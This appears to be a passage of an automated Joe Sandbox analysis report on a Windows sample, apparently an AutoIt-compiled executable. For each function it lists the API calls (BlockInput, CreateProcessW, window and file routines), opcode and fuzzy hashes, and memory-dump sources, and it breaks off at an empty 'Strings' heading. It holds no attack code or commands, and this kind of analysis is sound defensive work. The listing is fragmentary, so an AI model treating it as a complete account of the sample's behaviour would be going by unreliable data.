                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BlockInput
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3456056419-0
                                                                                                                                        • Opcode ID: a44fe418342093eebda2bdffbccef23e4f7f1f7f210e413b3649a635717c52cd
                                                                                                                                        • Instruction ID: 27019bf36219832249430e884aa50004c5e6ee3a420983ad996cde1dac2fd666
                                                                                                                                        • Opcode Fuzzy Hash: a44fe418342093eebda2bdffbccef23e4f7f1f7f210e413b3649a635717c52cd
                                                                                                                                        • Instruction Fuzzy Hash: D5E012752042049FC710AB69D848A96B7DC9F98750F00C427A945D7251DAB4E8008B90
                                                                                                                                        Function 007CF3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 007CF41A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogNtdllProc_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3239928679-0
                                                                                                                                        • Opcode ID: 510630f3ec74eafc68cd2aaf79f6e91a61d42d85b5afca0130bf01f4535f0b13
                                                                                                                                        • Instruction ID: a72a91bced3fac2087d53f025c37c61a5fc9f548af49e65a50c1b9f9f9d846d3
                                                                                                                                        • Opcode Fuzzy Hash: 510630f3ec74eafc68cd2aaf79f6e91a61d42d85b5afca0130bf01f4535f0b13
                                                                                                                                        • Instruction Fuzzy Hash: E4F06D31201299BFDF21DF58DC49FC67B95FB19360F148468FA11672E1CB746920D764
                                                                                                                                        Function 0077AC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0077ACC7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                        • Opcode ID: ee7a0c9187cac56f2678c9e0de5186c8f3dd14ac77cb7e9e270ec9ec84aa4833
                                                                                                                                        • Instruction ID: e008f0feb58533fcf386d515d72ba7c946801435249c45c9ae14483cd0af8c52
                                                                                                                                        • Opcode Fuzzy Hash: ee7a0c9187cac56f2678c9e0de5186c8f3dd14ac77cb7e9e270ec9ec84aa4833
                                                                                                                                        • Instruction Fuzzy Hash: 24E0E635100204FBDF15AF90DC55E583B26FB59394F10C414F6155A6A1CA369522DB51
                                                                                                                                        Function 007CF425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,007DF3D4,?,?,?,?,?,?), ref: 007CF450
                                                                                                                                          • Part of subcall function 007CE13E: _memset.LIBCMT ref: 007CE14D
                                                                                                                                          • Part of subcall function 007CE13E: _memset.LIBCMT ref: 007CE15C
                                                                                                                                          • Part of subcall function 007CE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00823EE0,00823F24), ref: 007CE18B
                                                                                                                                          • Part of subcall function 007CE13E: CloseHandle.KERNEL32 ref: 007CE19D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2364484715-0
                                                                                                                                        • Opcode ID: c5d8c157679d8b69fde0cc72a350a12cd07d9a46da9bfa98dac0fc62daac6985
                                                                                                                                        • Instruction ID: 8aeef0e2c43434349d8bdfae7087f30b8b09cb9af29a31cce4266c366c6b9abb
                                                                                                                                        • Opcode Fuzzy Hash: c5d8c157679d8b69fde0cc72a350a12cd07d9a46da9bfa98dac0fc62daac6985
                                                                                                                                        • Instruction Fuzzy Hash: E0E01231100248EFCB11AF48DC48E963BA2FB08340F008028FA005B2B1C735A921EF40
                                                                                                                                        Function 007CF37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL ref: 007CF3A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogNtdllProc_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3239928679-0
                                                                                                                                        • Opcode ID: 303574ff6220922263053e3b454c94ac8f8a9371c915c774e5014347f251cf20
                                                                                                                                        • Instruction ID: 8e4f26c089b0cef339bcaad0cc1ec9bcfd84b7c7330addcf011cb1ba82542ada
                                                                                                                                        • Opcode Fuzzy Hash: 303574ff6220922263053e3b454c94ac8f8a9371c915c774e5014347f251cf20
                                                                                                                                        • Instruction Fuzzy Hash: 7EE0173820424CEFCB01DF88DC88E863BA5FB2A350F004054FD048B361C771A831DB61
                                                                                                                                        Function 007CF3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL ref: 007CF3D0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogNtdllProc_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3239928679-0
                                                                                                                                        • Opcode ID: 68c9541a09d038cc0b327ea15c8106163e5c3156b1230c6cb090d97bedd41f9f
                                                                                                                                        • Instruction ID: 892ffc0a6cbb9e87ddabb0839d91ab90f935472d51149e6493763c28e7aac9ae
                                                                                                                                        • Opcode Fuzzy Hash: 68c9541a09d038cc0b327ea15c8106163e5c3156b1230c6cb090d97bedd41f9f
                                                                                                                                        • Instruction Fuzzy Hash: D5E0173820024CEFCB01DF88D888E863BA5FB1A350F004054FD048B362C772A831EBA1
                                                                                                                                        Function 0077B845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                          • Part of subcall function 0077B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0077B85B), ref: 0077B926
                                                                                                                                          • Part of subcall function 0077B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0077B85B,00000000,?,?,0077AF1E,?,?), ref: 0077B9BD
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0077AF1E,?,?), ref: 0077B864
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2797419724-0
                                                                                                                                        • Opcode ID: b439e6566f6fb423a0f7733aa936db99d2b3dc33a75b96dfd3ac2b708d0b73a3
                                                                                                                                        • Instruction ID: be1723d4c394271298b413e4aa8b4d6d286bd5ba5de3f8b71e07aec7ae63638e
                                                                                                                                        • Opcode Fuzzy Hash: b439e6566f6fb423a0f7733aa936db99d2b3dc33a75b96dfd3ac2b708d0b73a3
                                                                                                                                        • Instruction Fuzzy Hash: ECD0127114430CF7DF102BA1DC0FF4D7A1DEB54794F50C431F709691E28A76A8609599
                                                                                                                                        Function 00788E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00788E1F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        • Opcode ID: bccdaecb33299f75c1df90081a68cad7c279f9c0276dde5202d822d6058c6b80
                                                                                                                                        • Instruction ID: 8d37776c284a7f892a8e1a826e523ab5c0e6c28113beaffca61f2ccd9cf52b36
                                                                                                                                        • Opcode Fuzzy Hash: bccdaecb33299f75c1df90081a68cad7c279f9c0276dde5202d822d6058c6b80
                                                                                                                                        • Instruction Fuzzy Hash: 22A0243000050CF7CF001F51FC044457F5CD70D150700C010F40C04031C7335C1045C5
                                                                                                                                        Function 0078A937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcessHeap.KERNEL32(00786AE9,008167D8,00000014), ref: 0078A937
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                        • Opcode ID: b18ae9765736072a677163c35c79f32ced4fa71fcd8d3441b73aab011f2699a9
                                                                                                                                        • Instruction ID: 8014392737f540585bdc218daaa970a61f7c7985c0998b46c845cb395ef945ad
                                                                                                                                        • Opcode Fuzzy Hash: b18ae9765736072a677163c35c79f32ced4fa71fcd8d3441b73aab011f2699a9
                                                                                                                                        • Instruction Fuzzy Hash: A0B012B03031024BD7184B38AC9411A3DD4674E101302C03D7003C6561DB308850DF00
                                                                                                                                        Function 00780EC4 Relevance: .3, Instructions: 345COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                        • Instruction ID: 574f71f76d739be1d6bbc86b7879d8d189c0399fd4abc0615e237747ccf146d8
                                                                                                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                        • Instruction Fuzzy Hash: 59C103723851934ADF6D963AC43443EFBA15EA27B131A476DD8B3CB4C0EE28C529D760
                                                                                                                                        Function 007812F9 Relevance: .3, Instructions: 341COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                        • Instruction ID: 5940717e816f3e98db8f73977b73e4ca469383b445937798f50921ea97e48dff
                                                                                                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                        • Instruction Fuzzy Hash: CEC123722851934ADF6D963AC43043EBBA55AA27B131A076DD8B3CB4C4FE28C529D760
                                                                                                                                        Function 00780A8F Relevance: .3, Instructions: 331COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                        • Instruction ID: 08f61a614cbc471dabcfb8d66a46f37b6f528f80fed731d4afa6fbeedbbb1e3b
                                                                                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                        • Instruction Fuzzy Hash: 56C1C37238529349DFAD563AC43443EFBA15AA27B531A476DD4B3CB4C0EE28C52CD7A0
                                                                                                                                        Function 00780677 Relevance: .3, Instructions: 323COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                        • Instruction ID: 9736d9da3ae2deda822d583dffa82abb487ad7580daa5d0476c8c7839f0c6fd0
                                                                                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                        • Instruction Fuzzy Hash: B3C1F47238529349DFAD563AC43443EBBA15EA27B130A476DD4B3CB4C1EE28D52CC7A0
                                                                                                                                        Function 007BA750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007BA7A5
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007BA7B7
                                                                                                                                        • DestroyWindow.USER32 ref: 007BA7C5
                                                                                                                                        • GetDesktopWindow.USER32 ref: 007BA7DF
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 007BA7E6
                                                                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007BA927
                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007BA937
                                                                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BA97F
                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 007BA98B
                                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007BA9C5
                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BA9E7
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BA9FA
                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BAA05
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 007BAA0E
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BAA1D
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 007BAA26
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BAA2D
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 007BAA38
                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 007BAA4A
                                                                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007ED9BC,00000000), ref: 007BAA60
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 007BAA70
                                                                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007BAA96
                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007BAAB5
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BAAD7
                                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007BACC4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
